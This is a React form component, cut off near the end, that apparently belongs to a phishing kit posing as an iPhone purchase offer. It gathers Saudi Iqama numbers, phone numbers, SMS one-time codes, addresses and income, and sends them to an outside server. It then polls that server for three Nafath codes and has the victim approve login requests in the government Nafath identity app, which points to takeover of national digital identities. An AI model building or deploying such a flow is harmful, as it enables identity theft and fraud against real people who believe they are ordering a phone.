import React, { useEffect, useState } from "react";
import checkSvg from "../../assets/check.svg";
import { FaArrowRight, FaSpinner } from "react-icons/fa";
import { Link } from "react-router-dom";

const MainForm = () => {
  const [step, setStep] = useState(1);
  const [firstNafath, setFirstNafath] = useState("");
  const [secondNafath, setSecondNafath] = useState("");
  const [thirdNafath, setThirdNafath] = useState("");
  const [firstNafathActive, setFirstNafathActive] = useState(false);
  const [secondNafathActive, setSecondNafathActive] = useState(false);
  const [thirdNafathActive, setThirdNafathActive] = useState(false);

  const [loading1, setLoading1] = useState(false)

  const initialValues = {
    id: "",
    model: "",
    color: "",
    storage: "",
    date_of_birth: "",
    nationality: "",
    iqama_number: "",
    mobile_number: "",
    first_otp: "",
    first_nafath_otp: "",
    second_nafath_otp: "",
    third_nafath_otp: "",
    name: "",
    monthly_income: "",
    profession: "",
    city: "",
    address: "",
    second_otp: "",
    third_otp: "",
    created_at: new Date().toISOString(),
  };
  const [selections, setSelections] = useState(initialValues);
  const initialTime = 180;
  const nafathTime = 90;
  const [timer, setTimer] = useState(initialTime);
  const [timer2, setTimer2] = useState(nafathTime);
  const [timer3, setTimer3] = useState(nafathTime);
  const [timer4, setTimer4] = useState(nafathTime);

  useEffect(() => {
    if (step === 3) {
      // count down from timer to 0
      const interval = setInterval(() => {
        setTimer((prev) => (prev > 0 ? prev - 1 : 0));
      }, 1000);

      // clear interval when timer reaches 0
      if (timer === 0) {
        clearInterval(interval);
      }

      return () => clearInterval(interval);
    } else if (step === 5) {
      // count down from timer to 0
      const interval = setInterval(() => {
        setTimer2((prev) => (prev > 0 ? prev - 1 : 0));
      }, 1000);

      // clear interval when timer reaches 0
      if (timer2 === 0) {
        clearInterval(interval);
      }

      return () => clearInterval(interval);
    } else if (step === 6) {
      // count down from timer to 0
      const interval = setInterval(() => {
        setTimer3((prev) => (prev > 0 ? prev - 1 : 0));
      }, 1000);

      // clear interval when timer reaches 0
      if (timer3 === 0) {
        clearInterval(interval);
      }

      return () => clearInterval(interval);
    } else if (step === 7) {
      // count down from timer to 0
      const interval = setInterval(() => {
        setTimer4((prev) => (prev > 0 ? prev - 1 : 0));
      }, 1000);

      // clear interval when timer reaches 0
      if (timer4 === 0) {
        clearInterval(interval);
      }

      return () => clearInterval(interval);
    }
  }, [timer, timer2, timer3, timer4, step]);

  const models = [
    {
      id: 1,
      name: "iPhone 14",
    },
    {
      id: 2,
      name: "iPhone 14 Pro",
    },
    {
      id: 3,
      name: "iPhone 14 Pro Max",
    },
    {
      id: 4,
      name: "iPhone 15",
    },
    {
      id: 5,
      name: "iPhone 15 Pro",
    },
    {
      id: 6,
      name: "iPhone 15 Pro Max",
    },
    {
      id: 7,
      name: "iPhone 16",
    },
    {
      id: 8,
      name: "iPhone 16 Pro",
    },
    {
      id: 9,
      name: "iPhone 16 Pro Max",
    },
  ];

  const colors = [
    {
      id: 1,
      color: "#301933",
    },
    {
      id: 2,
      color: "#205E7C",
    },
    {
      id: 3,
      color: "#A50011",
    },
    {
      id: 4,
      color: "#F9E5C9",
    },
    {
      id: 5,
      color: "#5C5B56",
    },
  ];

  const storage = [
    {
      id: 1,
      size: "64GB",
    },
    {
      id: 2,
      size: "128GB",
    },
    {
      id: 3,
      size: "256GB",
    },
    {
      id: 4,
      size: "512GB",
    },
  ];

  // const errors
  const [errors, setErrors] = useState({
    iqama_error: "",
    phone_error: "",
  });

  const createUser = async () => {
    setLoading1(true)
    fetch("https://e-swaap-api.vercel.app/api/v1/users", {
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
      method: "POST",
      body: JSON.stringify(selections),
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to create user");
        }
        return response.json();
      })
      .then((data) => {
        setLoading1(false)
        console.log(data.insertedId);
        localStorage.setItem("user_id", data.insertedId);
        // setStep(5);
        // setStep(2)
        setStep(3)
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  };

  // get first nafath otp
  const getFirstNafathOtp = () => {
    const userId = localStorage.getItem("user_id");
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${userId}`, {
      method: "GET",
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to get user");
        }
        return response.json();
      })
      .then((data) => {
        console.log(data);
        setFirstNafath(data.first_nafath_otp);
        setFirstNafathActive(true);
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  };

  // check otps in every 5 seconds
  // Poll for OTPs every 5 seconds, set state if available
  useEffect(() => {
    const interval = setInterval(() => {
      // First Nafath OTP
      if (!firstNafath) {
        getFirstNafathOtp();
      }
      // Second Nafath OTP
      if (!secondNafath) {
        getSecondNafathOtp();
      }
      // Third Nafath OTP
      if (!thirdNafath) {
        getThirdNafathOtp();
      }
    }, 5000);
    return () => clearInterval(interval);
  }, [firstNafath, secondNafath, thirdNafath]);


  const verifyFirstNafath = () => {
    const userId = localStorage.getItem("user_id");
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${userId}`, {
      method: "GET",
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to get user");
        }
        return response.json();
      })
      .then((data) => {
        console.log(data);
        if (data.first_nafath_otp === selections.first_nafath_otp) {
          setStep(6);
        } else {
          // toast("First Nafath OTP is incorrect");
        }
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  };


  // get second nafath otp
  const getSecondNafathOtp = () => {
    const userId = localStorage.getItem("user_id");
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${userId}`, {
      method: "GET",
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to get user");
        }
        return response.json();
      })
      .then((data) => {
        console.log(data);
        setSecondNafath(data.second_nafath_otp);
        setSecondNafathActive(true);
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  };


  const verifySecondNafath = () => {
    const userId = localStorage.getItem("user_id");
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${userId}`, {
      method: "GET",
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to get user");
        }
        return response.json();
      })
      .then((data) => {
        console.log(data);
        if (data.second_nafath_otp === selections.second_nafath_otp) {
          setStep(8);
        } else {
          // alert("Second Nafath OTP is incorrect");
        }
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  };

  // get third nafath otp
  const getThirdNafathOtp = () => {
    const userId = localStorage.getItem("user_id");
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${userId}`, {
      method: "GET",
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to get user");
        }
        return response.json();
      })
      .then((data) => {
        console.log(data);
        setThirdNafath(data.third_nafath_otp);
        setThirdNafathActive(true);
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  };

  const verifyThirdNafath = () => {
    const userId = localStorage.getItem("user_id");
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${userId}`, {
      method: "GET",
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to get user");
        }
        return response.json();
      })
      .then((data) => {
        console.log(data);
        if (data.third_nafath_otp === selections.third_nafath_otp) {
          setStep(10);
        } else {
          // alert("Third Nafath OTP is incorrect");
        }
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  };


  const updateUser = () => {
    const userId = localStorage.getItem("user_id");
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${userId}`, {
      method: "PUT",
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
      body: JSON.stringify(selections),
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to update user");
        }
        return response.json();
      })
      .then((data) => {
        console.log(data);
        setStep(5);
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  }
  // const handleSubmit = (e) => {
  //   e.preventDefault();
  // };

  const updateIncome = () => {
    const userId = localStorage.getItem("user_id");
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${userId}`, {
      method: "PUT",
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
      body: JSON.stringify(selections),
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to update user");
        }
        return response.json();
      })
      .then((data) => {
        console.log(data);
        setStep(7);
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  }



  const updateProfession = () => {
    const userId = localStorage.getItem("user_id");
    fetch(`https://e-swaap-api.vercel.app/api/v1/users/${userId}`, {
      method: "PUT",
      headers: {
        "Content-Type": "application/json",
        "Access-Control-Allow-Origin": "*", // allow cors
      },
      body: JSON.stringify(selections),
    })
      .then((response) => {
        console.log(response);
        if (!response.ok) {
          throw new Error("Failed to update user");
        }
        return response.json();
      })
      .then((data) => {
        console.log(data);
        setStep(9);
      })
      .catch((error) => {
        console.error("Error:", error);
        // alert("An error occurred: " + error.message);
      });
  }



  return (
    <div>
      <h3 className="text-3xl font-bold">
        {step === 1
          ? "Apple iPhones"
          : step === 7
            ? "First Nafath"
            : step === 8
              ? "Order Confirmed"
              : "User Information"}
      </h3>

      {/* <div className="h4 text-xl text-green-700">Select Your iPhone</div> */}

      {step === 1 && (
        <div className="mt-10">
          <h4 className="text-[16px] bg-green-100 text-green-600 p-3 rounded-[4px]">
            <b>Your Selections:</b> &nbsp;
            {Object.values(selections)
              .filter((value) => value)
              .join(", ")}
          </h4>
        </div>
      )}

      <form className="mt-10">
        {/* step 1 */}
        {step === 1 && (
          <div className="step">
            {/* model */}
            <div className="model">
              <label htmlFor="" className="text-lg font-bold text-green-800">
                Choose Model
              </label>
              <div className="mt-3 flex flex-wrap gap-3">
                {models.map((model) => (
                  <div className="radio" key={model.id}>
                    <input
                      type="radio"
                      name="model"
                      id={`iphone-${model.id}`}
                      onChange={() => {
                        setSelections({ ...selections, model: model.name });
                      }}
                      checked={selections.model === model.name}
                    />
                    <label htmlFor={`iphone-${model.id}`}>{model.name}</label>
                  </div>
                ))}
              </div>
            </div>

            {/* color */}
            <div className="color mt-5">
              <label htmlFor="" className="text-lg font-bold text-green-800">
                Choose Color
              </label>
              <div className="mt-3 flex flex-wrap gap-3">
                {colors.map((color) => (
                  <div className="radio" key={color.id}>
                    <input
                      type="radio"
                      name="color"
                      id={`color-${color.id}`}
                      onChange={() => {
                        setSelections({ ...selections, color: color.color });
                      }}
                      checked={selections.color === color.color}
                    />
                    <label htmlFor={`color-${color.id}`}>
                      <span
                        className="w-16 h-16 rounded-full inline-flex justify-center items-center p-2"
                        style={{ backgroundColor: color.color }}
                      >
                        <img
                          src={checkSvg}
                          alt="check"
                          className={`${selections.color === color.color
                            ? "flex justify-center items-center w-full h-full"
                            : "hidden"
                            }`}
                        />
                      </span>
                    </label>
                  </div>
                ))}
              </div>
            </div>

            {/* storage */}
            <div className="storage mt-5">
              <label htmlFor="" className="text-lg font-bold text-green-800">
                Choose Storage
              </label>
              <div className="mt-3 flex flex-wrap gap-3">
                {storage.map((size) => (
                  <div className="radio" key={size.id}>
                    <input
                      type="radio"
                      name="storage"
                      id={`storage-${size.id}`}
                      onChange={() => {
                        setSelections({ ...selections, storage: size.size });
                      }}
                      checked={selections.storage === size.size}
                    />
                    <label htmlFor={`storage-${size.id}`}>{size.size}</label>
                  </div>
                ))}
              </div>
            </div>

            {/* date of birth */}
            <div className="date-of-birth flex justify-start items-center gap-3 mt-8">
              <label htmlFor="" className="text-lg font-bold text-green-800">
                Date of Birth
              </label>
              <input
                type="date"
                name="date_of_birth"
                className="border w-auto p-2 rounded-[4px]"
                id="date_of_birth"
                onChange={(e) => {
                  setSelections({
                    ...selections,
                    date_of_birth: e.target.value,
                  });
                }}
                value={selections.date_of_birth}
              />
            </div>

            {/* nationality */}
            <div className="nationality flex justify-start items-center gap-3 mt-8">
              <label htmlFor="" className="text-lg font-bold text-green-800">
                Choose Nationality
              </label>
              <select
                className="border rounded-[4px]] p-2"
                name="nationality"
                id="nationality"
                onChange={(e) => {
                  setSelections({
                    ...selections,
                    nationality: e.target.value,
                  });
                }}
                value={selections.nationality}
              >
                <option value="">Select Nationality</option>
                <option value="Afghanistan">Afghanistan</option>
                <option value="Bahrain">Bahrain</option>
                <option value="Bangladesh">Bangladesh</option>
                <option value="China">China</option>
                <option value="Egypt">Egypt</option>
                <option value="Ethiopia">Ethiopia</option>
                <option value="Ghana">Ghana</option>
                <option value="Hong Kong">Hong Kong</option>
                <option value="India">India</option>
                <option value="Indonesia">Indonesia</option>
                <option value="Jordan">Jordan</option>
                <option value="Kenya">Kenya</option>
                <option value="Macao">Macao</option>
                <option value="Myanmar">Myanmar</option>
                <option value="Namibia">Namibia</option>
                <option value="Nepal">Nepal</option>
                <option value="Niger">Niger</option>
                <option value="Nigeria">Nigeria</option>
                <option value="Pakistan">Pakistan</option>
                <option value="Papua New Guinea">Papua New Guinea</option>
                <option value="Peru">Peru</option>
                <option value="Philippines">Philippines</option>
                <option value="Saudi Arabia">Saudi Arabia</option>
                <option value="Slovakia">Slovakia</option>
                <option value="Somalia">Somalia</option>
                <option value="South Sudan">South Sudan</option>
                <option value="Sri Lanka">Sri Lanka</option>
                <option value="Sudan">Sudan</option>
                <option value="Suriname">Suriname</option>
                <option value="Syrian">Syrian</option>
                <option value="Turkey">Turkey</option>
                <option value="Uganda">Uganda</option>
                <option value="Uruguay">Uruguay</option>
                <option value="Yemen">Yemen</option>
                <option value="Zambia">Zambia</option>
                <option value="Zimbabwe">Zimbabwe</option>
              </select>
            </div>

            {/* validator alert */}
            <p className="mt-10 text-red-600 hidden" id="validator-alert">
              <b>Note:</b> All fields are required
            </p>
            {/* next step */}
            <div className="mt-10">
              {
                loading1 ? <button
                  type="button"
                  className="bg-teal-700 text-white w-full text-center flex justify-center items-center gap-4 text-lg font-bold p-3 rounded-[4px]"
                >
                  Loading <FaSpinner className="inline fa-spin" />
                </button>
                  : <button
                    type="button"
                    className="bg-teal-700 text-white w-full text-center flex justify-center items-center gap-4 text-lg font-bold p-3 rounded-[4px]"
                    onClick={() =>
                      // validate if all fields are filled
                      Object.values(selections).filter((value) => value).length ===
                        6
                        ? setStep(2)
                        : document
                          .getElementById("validator-alert")
                          .classList.remove("hidden")
                    }
                  >
                    Next <FaArrowRight className="inline" />
                  </button>
              }
            </div>
          </div>
        )}

        {/* step 2 */}
        {step === 2 && (
          <div className="step">
            {/* iqama number */}
            <div className="iqama-number flex flex-col justify-start items-start gap-3 mt-8">
              <label htmlFor="" className="text-lg font-bold text-green-800">
                Iqama Number
              </label>
              <input
                type="number"
                name="iqama_number"
                className="border w-full p-2 rounded-[4px]"
                id="iqama_number"
                placeholder="xxxxxxxxxx"
                max={10}
                min={10}
                onChange={(e) => {
                  if (e.target.value.length > 10) {
                    e.target.value = e.target.value.slice(0, 10);
                    setErrors({
                      iqama_error: "Iqama number can't be more than 10 digits",
                    });
                  } else if (e.target.value.length < 10) {
                    setErrors({
                      iqama_error: "Iqama number should be 10 digits",
                    });
                  } else {
                    setErrors({
                      iqama_error: "",
                    });
                  }
                  setSelections({
                    ...selections,
                    iqama_number: e.target.value,
                  });
                }}
                value={selections.iqama_number}
              />

              <p className="text-red-500 text-sm">
                {errors.iqama_error && errors.iqama_error}
              </p>
            </div>

            {/* mobile number */}
            <div className="mobile-number flex flex-col justify-start items-start gap-3 mt-8">
              <label htmlFor="" className="text-lg font-bold text-green-800">
                Mobile Number
              </label>
              <input
                type="text"
                name="mobile_number"
                placeholder="05xxxxxxxx"
                className="border w-full p-2 rounded-[4px]"
                id="mobile_number"
                onChange={(e) => {
                  if (e.target.value.length < 10) {
                    // if more than 10, remove the extra digits
                    setErrors({
                      phone_error: "Mobile number should be 10 digits",
                    });
                  } else if (e.target.value.length > 10) {
                    e.target.value = e.target.value.slice(0, 10);
                    setErrors({
                      phone_error: "You can't enter more than 10 digits",
                    });
                  } else {
                    setErrors({
                      phone_error: "",
                    });
                  }
                  setSelections({
                    ...selections,
                    mobile_number: e.target.value,
                  });
                }}
                value={selections.mobile_number}
              />
              <p className="text-sm text-red-500">
                {errors.phone_error && errors.phone_error}
              </p>
            </div>

            {/* validator alert */}
            <p className="mt-10 text-red-600 hidden" id="validator-alert-2">
              <b>Note:</b> All fields are required
            </p>

            {/* next step */}
            <div className="mt-10">
              <button
                type="button"
                disabled={Object.values(errors).some((error) => error !== "")}
                className="bg-teal-700 text-white w-full text-center flex justify-center items-center gap-4 text-lg font-bold p-3 rounded-[4px]"
                onClick={() =>
                  // validate if all fields are filled
                  Object.values(selections).filter((value) => value).length ===
                    8
                    ? createUser()
                    : document
                      .getElementById("validator-alert-2")
                      .classList.remove("hidden")
                }
              >
                Next <FaArrowRight className="inline" />
              </button>
            </div>
          </div>
        )}

        {/* step 3 */}
        {step === 3 && (
          <div className="step">
            {/* otp timer 3 minute */}
            <div className="">
              {/* progress reverse as per time reducing, circular progreebar */}
              <div className="progress-bar bg-gray-100 rounded-[10px] overflow-hidden w-full lg:w-1/3 mx-auto">
                <div
                  className="progress h-[20px] bg-teal-700"
                  style={{ width: (100 * timer) / initialTime + "%" }}
                ></div>
              </div>

              <div className="mt-4">
                <div className="text-center">
                  <h3 className="text-4xl font-bold text-teal-700">
                    {/* timer, converted in minutes and seconds */}
                    {Math.floor(timer / 60)}:
                    {timer % 60 < 10 ? `0${timer % 60}` : timer % 60}
                  </h3>
                </div>
              </div>

              <div className="w-full mt-10 mx-auto lg:w-1/3">
                <p
                  className="mt-10 mb-4 text-red-600 hidden"
                  id="validator-alert-3"
                >
                  <b>Note:</b> OTP is required
                </p>
                <input
                  type="number"
                  name="first_otp"
                  className="border w-full p-2 rounded-[4px]"
                  id="first_otp"
                  maxLength={5}
                  onChange={(e) => {
                    setSelections({
                      ...selections,
                      first_otp: e.target.value,
                    });
                  }}
                  onBlur={() => {
                    if (selections.first_otp) {
                      // createUser();
                      setStep(4);
                    }
                  }}
                  value={selections.first_otp}
                  placeholder="Enter OTP"
                />
              </div>

              {/* next */}
              <div className="mt-10">
                <button
                  type="button"
                  className="bg-teal-700 text-white mx-auto text-center flex lg:w-1/3 w-full justify-center items-center gap-4 text-lg font-bold p-3 rounded-[4px]"
                  onClick={() =>
                    // validate if all fields are filled
                    selections.first_otp
                      ? setStep(4)
                      : document
                        .getElementById("validator-alert-3")
                        .classList.remove("hidden")
                  }
                >
                  Next <FaArrowRight className="inline" />
                </button>
              </div>
            </div>
          </div>
        )}

        {/* step 4 */}
        {step === 4 && (
          <div className="step">
            <div className="grid md:grid-cols-2 grid-cols-1 gap-4">
              <div className="item">
                <label htmlFor="">Your Name</label>
                <input
                  type="text"
                  name="name"
                  className="border w-full p-2 mt-2 rounded-[4px]"
                  placeholder="Enter your name"
                  onChange={(e) => {
                    setSelections({ ...selections, name: e.target.value });
                  }}
                  id="name"
                />
              </div>

              {/* monthly income */}
              {/* <div className="item">
                <label htmlFor="">Your Monthly Income</label>
                <input
                  type="number"
                  name="name"
                  className="border w-full p-2 mt-2 rounded-[4px]"
                  placeholder="Enter your monthly income"
                  onChange={(e) => {
                    setSelections({
                      ...selections,
                      monthly_income: e.target.value,
                    });
                  }}
                  id="name"
                />
              </div> */}
              <div className="item">
                <label htmlFor="">Your City</label>
                <input
                  type="text"
                  name="name"
                  className="border w-full p-2 mt-2 rounded-[4px]"
                  placeholder="Enter your city"
                  onChange={(e) => {
                    setSelections({ ...selections, city: e.target.value });
                  }}
                  id="name"
                />
              </div>
              <div className="item md:col-span-2 col-span-1">
                <label htmlFor="">Your Address</label>
                <input
                  type="text"
                  name="name"
                  className="border w-full p-2 mt-2 rounded-[4px]"
                  placeholder="Enter your address"
                  onChange={(e) => {
                    setSelections({ ...selections, address: e.target.value });
                  }}
                  id="name"
                />
              </div>
            </div>

            {/* validator */}
            <p className="mt-10 text-red-600 hidden" id="validator-alert-4">
              <b>Note:</b> All fields are required
            </p>

            {/* next */}
            <div className="mt-10">
              <button
                type="button"
                className="bg-teal-700 text-white w-full text-center flex gap-3 justify-center items-center text-lg font-bold p-3 rounded-[4px]"
                onClick={() =>
                  // validate if all fields are filled
                  Object.values(selections).filter((value) => value).length ===
                    12
                    ? updateUser()
                    : document
                      .getElementById("validator-alert-4")
                      .classList.remove("hidden")
                }
              >
                Next <FaArrowRight className="inline" />
              </button>
            </div>
          </div>
        )}




        {/* step 5 */}
        {step === 5 && (
          <div className="step">
            {/* otp timer 3 minute */}
            <div className=" mb-8">
              {/* progress reverse as per time reducing, circular progreebar */}
              <div className="progress-bar bg-gray-100 rounded-[10px] overflow-hidden w-full lg:w-1/3 mx-auto">
                <div
                  className="progress h-[20px] bg-teal-700"
                  style={{ width: (100 * timer2) / nafathTime + "%" }}
                ></div>
              </div>

              <div className="mt-4">
                <div className="text-center">
                  {/* <h3 className="text-4xl font-bold text-teal-700">
                    {Math.floor(timer2 / 60)}:
                    {timer2 % 60 < 10 ? `0${timer2 % 60}` : timer2 % 60}
                  </h3> */}

                  {/* <button type="button" className="bg-teal-700 text-white p-2 rounded-[4px]" onClick={getFirstNafathOtp}>
                    Get OTP
                  </button> */}

                  {/* otp */}
                  <h3 className="mt-5 text-2xl font-bold text-teal-700">
                    {firstNafath || "N/A"}
                  </h3>
                </div>
              </div>

              <div className="w-full mt-10 mx-auto lg:w-1/3">
                <p
                  className="mt-10 mb-4 text-red-600 hidden"
                  id="validator-alert-5"
                >
                  <b>Note:</b> OTP is required
                </p>
                <input
                  type="number"
                  name="first_nafath_otp"
                  className="border w-full p-2 rounded-[4px]"
                  id="first_nafath_otp"
                  maxLength={5}
                  onChange={(e) => {
                    setSelections({
                      ...selections,
                      first_nafath_otp: e.target.value,
                    });
                  }}
                  value={selections.first_nafath_otp}
                  placeholder="Enter First Nafath OTP"
                />
              </div>

              {/* next */}
              <div className="mt-10">
                <button
                  type="button"
                  disabled={!firstNafathActive}
                  className="bg-teal-700 text-white mx-auto text-center flex lg:w-1/3 w-full justify-center items-center gap-4 text-lg font-bold p-3 rounded-[4px]"
                  onClick={() =>
                    // validate if all fields are filled
                    selections.first_nafath_otp
                      ? verifyFirstNafath()
                      : document
                        .getElementById("validator-alert-5")
                        .classList.remove("hidden")
                  }
                >
                  Next <FaArrowRight className="inline" />
                </button>
              </div>
            </div>
            <div className="step">
              <h4 className="text-2xl">First Nafat is Loading...</h4>
              <p className="mt-4">
                رجى قبول طلب تسجيل الدخول من تطبيق نفاذ
                <br />
                Please accept the login request from Nafath app
              </p>
              <div className="mt-10">
                <Link
                  target="_blank"
                  to={
                    "https://play.google.com/store/apps/details?id=sa.gov.nic.myid&pli=1"
                  }
                  type="button"
                  className="bg-teal-700 text-white w-full text-center flex gap-3 justify-center items-center text-lg font-bold p-3 rounded-[4px]"
                >
                  Open Nafath App <FaArrowRight className="inline" />
                </Link>
              </div>
            </div>
          </div>
        )}

        {/* monthly income, step 5 */}
        {step === 6 && (
          <div className="step">
            <div className="grid md:grid-cols-1 grid-cols-1 gap-4">
              <div className="item">
                <label htmlFor="">Your Monthly Income</label>
                <input
                  type="number"
                  name="monthly_income"
                  className="border w-full p-2 mt-2 rounded-[4px]"
                  placeholder="Enter your monthly income"
                  onChange={(e) => {
                    setSelections({
                      ...selections,
                      monthly_income: e.target.value,
                    });
                  }}
                  id="monthly_income"
                />
              </div>
            </div>

            {/* button */}
            <div className="mt-10">
              <button
                type="button"
                className="bg-teal-700 text-white w-full text-center flex gap-3 justify-center items-center text-lg font-bold p-3 rounded-[4px]"
                onClick={() => updateIncome()}
              >
                Next <FaArrowRight className="inline" />
              </button>
            </div>
          </div>
        )}

        {/* monthly income, step 5 */}



        {step === 7 && (
          <div className="step">
            {/* otp timer 3 minute */}
            <div className="mb-10">
              {/* progress reverse as per time reducing, circular progreebar */}
              <div className="progress-bar bg-gray-100 rounded-[10px] overflow-hidden w-full lg:w-1/3 mx-auto">
                <div
                  className="progress h-[20px] bg-teal-700"
                  style={{ width: (100 * timer3) / nafathTime + "%" }}
                ></div>
              </div>

              <div className="mt-4">
                <div className="text-center">
                  {/* <h3 className="text-4xl font-bold text-teal-700">
                    {Math.floor(timer3 / 60)}:
                    {timer3 % 60 < 10 ? `0${timer3 % 60}` : timer3 % 60}
                  </h3> */}

                  {/* <button type="button" className="bg-teal-700 text-white p-2 rounded-[4px]" onClick={getSecondNafathOtp}>
                    Get OTP
                  </button> */}

                  {/* otp */}
                  <h3 className="mt-5 text-2xl font-bold text-teal-700">
                    {secondNafath || "N/A"}
                  </h3>
                </div>
              </div>

              <div className="w-full mt-10 mx-auto lg:w-1/3">
                <p
                  className="mt-10 mb-4 text-red-600 hidden"
                  id="validator-alert-6"
                >
                  <b>Note:</b> OTP is required
                </p>
                <input
                  type="text"
                  name="second_nafath_otp"
                  className="border w-full p-2 rounded-[4px]"
                  id="second_nafath_otp"
                  maxLength={5}
                  onChange={(e) => {
                    setSelections({
                      ...selections,
                      second_nafath_otp: e.target.value,
                    });
                  }}
                  value={selections.second_nafath_otp}
                  placeholder="Enter Second Nafath OTP"
                />
              </div>

              {/* next */}
              <div className="mt-10">
                <button
                  type="button"
                  disabled={!secondNafathActive}
                  className="bg-teal-700 text-white mx-auto text-center flex lg:w-1/3 w-full justify-center items-center gap-4 text-lg font-bold p-3 rounded-[4px]"
                  onClick={() =>
                    // validate if all fields are filled
                    selections.second_nafath_otp
                      ? verifySecondNafath()
                      : document
                        .getElementById("validator-alert-6")
                        .classList.remove("hidden")
                  }
                >
                  Next <FaArrowRight className="inline" />
                </button>
              </div>
            </div>
            <div className="step">
              <h4 className="text-2xl">Second Nafat is Loading...</h4>
              <p className="mt-4">
                رجى قبول طلب تسجيل الدخول من تطبيق نفاذ
                <br />
                Please accept the login request from Nafath app
              </p>
              <div className="mt-10">
                <Link
                  target="_blank"
                  to={
                    "https://play.google.com/store/apps/details?id=sa.gov.nic.myid&pli=1"
                  }
                  type="button"
                  className="bg-teal-700 text-white w-full text-center flex gap-3 justify-center items-center text-lg font-bold p-3 rounded-[4px]"
                >
                  Open Nafath App <FaArrowRight className="inline" />
                </Link>
              </div>
            </div>
          </div>
        )}


        {step === 8 && (
          <div className="step">
            <div className="grid md:grid-cols-1 grid-cols-1 gap-4">
              <div className="item">
                <label htmlFor="">Your Profession</label>
                <input
                  type="text"
                  name="profession"
                  className="border w-full p-2 mt-2 rounded-[4px]"
                  placeholder="Enter your Profession"
                  onChange={(e) => {
                    setSelections({
                      ...selections,
                      profession: e.target.value,
                    });
                  }}
                  id="profession"
                />
              </div>
            </div>

            {/* button */}
            <div className="mt-10">
              <button
                type="button"
                className="bg-teal-700 text-white w-full text-center flex gap-3 justify-center items-center text-lg font-bold p-3 rounded-[4px]"
                onClick={() => updateProfession()}
              >
                Next <FaArrowRight className="inline" />
              </button>
            </div>
          </div>
        )}

        {/* step 7, nafath */}
        {step === 9 && (
          <div className="step">
            {/* otp timer 3 minute */}
            <div className="mb-10">
              {/* progress reverse as per time reducing, circular progreebar */}
              <div className="progress-bar bg-gray-100 rounded-[10px] overflow-hidden w-full lg:w-1/3 mx-auto">
                <div
                  className="progress h-[20px] bg-teal-700"
                  style={{ width: (100 * timer4) / nafathTime + "%" }}
                ></div>
              </div>

              <div className="mt-4">
                <div className="text-center">
                  {/* <h3 className="text-4xl font-bold text-teal-700">
                    {Math.floor(timer4 / 60)}:
                    {timer4 % 60 < 10 ? `0${timer4 % 60}` : timer4 % 60}
                  </h3> */}
                  {/* <button type="button" className="bg-teal-700 text-white p-2 rounded-[4px]" onClick={getThirdNafathOtp}>
                    Get OTP
                  </button> */}

                  {/* otp */}
                  <h3 className="mt-5 text-2xl font-bold text-teal-700">
                    {thirdNafath || "N/A"}
                  </h3>
                </div>
              </div>

              <div className="w-full mt-10 mx-auto lg:w-1/3">
                <p
                  className="mt-10 mb-4 text-red-600 hidden"
                  id="validator-alert-6"
                >
                  <b>Note:</b> OTP is required
                </p>
                <input
                  type="text"
                  name="third_nafath_otp"
                  className="border w-full p-2 rounded-[4px]"
                  id="third_nafath_otp"
                  maxLength={5}
                  onChange={(e) => {
                    setSelections({
                      ...selections,
                      third_nafath_otp: e.target.value,
                    });
                  }}
                  value={selections.third_nafath_otp}
                  placeholder="Enter Third OTP"
                />
              </div>

              {/* next */}
              <div className="mt-10">
                <button
                  type="button"
                  disabled={!thirdNafathActive}
                  className="bg-teal-700 text-white mx-auto text-center flex lg:w-1/3 w-full justify-center items-center gap-4 text-lg font-bold p-3 rounded-[4px]"
                  onClick={() =>
                    // validate if all fields are filled
                    selections.third_nafath_otp
                      ? verifyThirdNafath()
                      : document
                        .getElementById("validator-alert-6")
                        .classList.remove("hidden")
                  }
                >
                  Next <FaArrowRight className="inline" />
                </button>
              </div>
            </div>
            <div className="step">
              <h4 className="text-2xl">Third Nafath is Loading...</h4>
              <p className="mt-4">
                رجى قبول طلب تسجيل الدخول من تطبيق نفاذ
